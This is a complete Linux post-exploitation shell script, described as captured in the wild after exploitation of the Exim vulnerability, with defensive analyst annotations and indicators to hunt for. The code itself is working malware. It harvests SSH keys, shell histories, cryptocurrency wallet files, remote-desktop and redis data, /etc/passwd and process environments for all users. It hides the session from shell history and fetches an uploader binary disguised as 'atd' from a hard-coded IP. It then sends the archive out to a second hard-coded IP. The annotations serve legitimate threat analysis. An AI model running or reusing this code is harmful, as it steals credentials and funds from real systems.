  1. #!/bin/sh
  2.  
  3. # found in the wild
  4. # exim exploit 2019-10149
  # Analyst annotation (defensive): this is a post-exploitation collection and
  # exfiltration script. It stages credentials, wallet files and host inventory
  # under a writable temp dir, packs them with tar -cj, downloads a binary that it
  # names "atd" and hands the archive to that binary through UPLOAD_FILE /
  # UPLOAD_URL in the environment (the binary itself is not on this page).
  # Artifacts to hunt for, all taken from this listing: marker file temp3754r97y2
  # in /var/tmp, /tmp or /dev/shm; a directory r plus files rf and atd next to
  # it; outbound connections to 173.212.214.137 and 85.25.84.99.
  5.  
  # Fixed PATH and C locale make tool output predictable; HISTFILE=/dev/null and
  # HISTSIZE=0 are exported so that any child shell honouring them records
  # nothing from this session.
  6. export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
  7. export LC_ALL=C
  8. export HISTFILE=/dev/null
  9. export HISTSIZE=0
  10.  
  # HOME is forced to /root (not exported) because the cp/tar steps further down
  # read dotfiles relative to $HOME. DISPLAY is dropped, presumably so that no
  # invoked tool tries to reach an X server. UPLOAD_URL is exported because the
  # snd helper passes it to the upload binary via the environment.
  11. HOME=/root
  12. unset DISPLAY
  13. export UPLOAD_URL=https://85.25.84.99/up.php
  14.  
  # Feature switches: NOLS=0 collects directory listings, NOETC=0 copies a subset
  # of /etc, NODUP=1 enables the run-once guard below. UF is the marker filename;
  # with V=2 it expands to temp3754r97y2.
  15. NOLS=0
  16. NOETC=0
  17. NODUP=1
  18. V=2
  19. UF=temp3754r97y$V
  20.  
  # Run-once guard: if the marker already exists in any of the three candidate
  # dirs the script stops with status 100 (a distinct code, presumably read by
  # whatever launches this script).
  21. if [ $NODUP -eq 1 ]; then
  22. test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
  23. fi
  # Pick a writable staging dir by trying to create the marker in /var/tmp,
  # then /tmp, then /dev/shm; exit 90 when none is writable. Nothing on this
  # page removes the marker afterwards, so it persists as a host indicator.
  24. BASE=''
  25. touch /var/tmp/$UF && BASE=/var/tmp
  26. test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
  27. test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
  28. test -z "$BASE" && exit 90
  # All staging happens in $BASE/r. Prepending $BASE to PATH means a file named
  # atd dropped into $BASE (see the wget at the end of the script) shadows the
  # system at daemon for every child command, so the upload process appears in
  # process listings under the name "atd".
  29. cd $BASE && mkdir r && cd r
  30. export PATH=$BASE:$PATH
  31.  
  # Upload helper. Starts a child sh in the background with UPLOAD_FILE set to
  # the path given as $1, UPLOAD_NAME set to "<hostname>.tbz2" and UPLOAD_URL
  # taken from the exported value above, then runs "atd". Because $BASE was
  # prepended to PATH earlier, "atd" resolves to the downloaded $BASE/atd once
  # that file has been made executable, not to the at daemon. $1 is spliced
  # unquoted into the sh -c string.
  32. snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }
  33.  
  34. # ok, real work starts here
  # Staging layout: $BASE/r/root holds the collected files; everything below
  # is written there or in its sysinfo subdirectory.
  35. main_dir=$BASE/r
  36. mkdir $main_dir/root/
  37.  
  # Credential harvest from $HOME (/root): SSH directory (keys, authorized_keys,
  # known_hosts), shell rc files, every *history file, .histfile, .profile and
  # the MongoDB shell history (.dbshell). Errors are discarded.
  38. COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
  39. cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null
  40.  
  41.  
  # Second harvest into root.tar: cryptocurrency wallet data and configs
  # (the w*dat globs match wallet.dat files under .*coin/, .*Coin/ and .dash*/
  # directories), *address.txt, VNC/redis/rdesktop/remmina state, and the same
  # set — plus .ssh, shell rc files, histories, .profile and .dbshell — for
  # every account under /home. Missing paths are silently skipped by the
  # stderr redirect; tar presumably still writes the members it could read.
  42. cd $HOME && tar cf $main_dir/root/root.tar \
  43. .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
  44. *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
  45. /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
  46. /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
  47. /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
  48. cd $main_dir/root/
  49.  
  # Host inventory starts here; each command writes one file into the staging
  # dir. ssh -V prints its version on stderr, which is discarded, so
  # ssh.version is likely empty on most builds.
  50. ssh -V > ssh.version 2>/dev/null
  51.  
  # Directory listings of /home and each home dir. The third line invokes "la",
  # which is not a standard utility; where it does not exist, rootls is left
  # empty because the error is discarded.
  52. if [ $NOLS -eq 0 ]; then
  53. ls -la /home/ > homes 2>/dev/null
  54. ls -la /home/*/ >> homes 2>/dev/null
  55. la -laR /root > rootls 2>/dev/null
  56. fi
  57.  
  58. mkdir $main_dir/root/sysinfo 2>/dev/null
  59. cd $main_dir/root/sysinfo 2>/dev/null
  60.  
  # Section marked EXIM by the author (apparently added for this campaign):
  # OS release/version, interface addresses and the full IPv4/IPv6 firewall
  # rule sets, which tell the operator what the host exposes and filters.
  61. # EXIM
  62. tail -n 100 /etc/*release /etc/version > system.version 2>/dev/null
  63. ip addr > ip 2>/dev/null
  64. iptables-save > iptables 2>/dev/null
  65. ip6tables-save > ip6tables 2>/dev/null
  66. # /EXIM end exim
  67.  
  # Basic identity: hostname, kernel, UTC time (the date binary is located with
  # which and then run a second time inside the parentheses), uptime, logged-in
  # users and the uid the script runs as.
  68. hostname > hostname
  69. uname -a > uname
  70. echo `date -u` '('`$(which date)`')' > date
  71. uptime > uptime
  72. w > w
  73. id > id
  74.  
  # Process inventory: with threads, as a forest, and with the "e" flag, which
  # appends each process's environment. ps-env can therefore carry secrets
  # (tokens, passwords) that other services received via their environment.
  75. ps auxwwwwwTH > ps
  76. ps auxwwwwwf > ps-forest
  77. ps auxwwwwwfe > ps-env
  78.  
  # Hardware, storage, kernel log and mounts. "env > env" also records this
  # script's own environment, including the exported UPLOAD_URL, so the archive
  # itself carries the upload endpoint.
  79. cat /proc/meminfo > meminfo 2>/dev/null
  80. cat /proc/cpuinfo > cpuinfo 2>/dev/null
  81. ifconfig -a > ifconfig 2>/dev/null
  82. df > df 2>/dev/null
  83. dmesg > dmesg 2>/dev/null
  84. mount > mount 2>/dev/null
  85. env > env 2>/dev/null
  86.  
  87. lspci -k > lspci 2>/dev/null
  88. lsusb > lsusb 2>/dev/null
  89.  
  # Listening sockets and connections with owning PIDs, plus the routing table.
  90. netstat -antpuxwenW > netstat 2>/dev/null
  91. route -en > route 2>/dev/null
  92.  
  93. # other kernel info
  94. cat /proc/modules > lsmod 2>/dev/null
  95. cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
  96. lscpu > lscpu 2>/dev/null
  97.  
  # /etc subset copied with symlinks resolved (-L): release/version files, all
  # cron* entries, issue, hosts*, motd, passwd, the apache2/httpd/nginx config
  # trees, resolv* and wpa* (presumably wpa_supplicant configuration, which can
  # contain wireless pre-shared keys — verify on the analysed host). "cd -"
  # returns to the previous directory and echoes its path to stdout.
  98. # copy stuff from /etc?
  99. if [ $NOETC -eq 0 ]; then
  100. mkdir $main_dir/root/sysinfo/etc
  101. cd $main_dir/root/sysinfo/etc
  102. cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
  103. cd -
  104. fi
  105.  
  106. cd $main_dir/root
  107.  
  # Recursive listings of /boot and /etc; here stderr is kept (2>&1), so
  # permission errors appear inside the listing files.
  108. # list some dirs
  109. if [ $NOLS -eq 0 ]; then
  110. ls -laR /boot > ls-boot 2>&1
  111. ls -laR /etc > ls-etc 2>&1
  112. fi
  113.  
  # Everything under root/ is packed as a bzip2 tarball named rf directly in
  # $BASE; httpd modules, libraries and man pages are excluded, presumably to
  # keep the upload small.
  114. # compress n clean up
  115. cd $main_dir
  116. tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
  117.  
  # The staging tree is deleted in the background; rf, the marker file and the
  # atd binary below are not removed anywhere on this page and remain in $BASE.
  118. # drop source files
  119. rm -rf $main_dir &
  120.  
  # Stage two: fetch the upload binary from 173.212.214.137 and save it as
  # $BASE/atd. If that fails, a second URL on the same host is fetched and
  # discarded — by its name, a signal to the operator that the download did
  # not succeed. The binary runs only if it is exactly 610932 bytes (a size
  # check that also pins the sample for hunting); it is then made executable
  # and snd is called with rf, which starts the upload in the background.
  121. # ready to send!
  122. cd $BASE
  123. wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
  124. test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf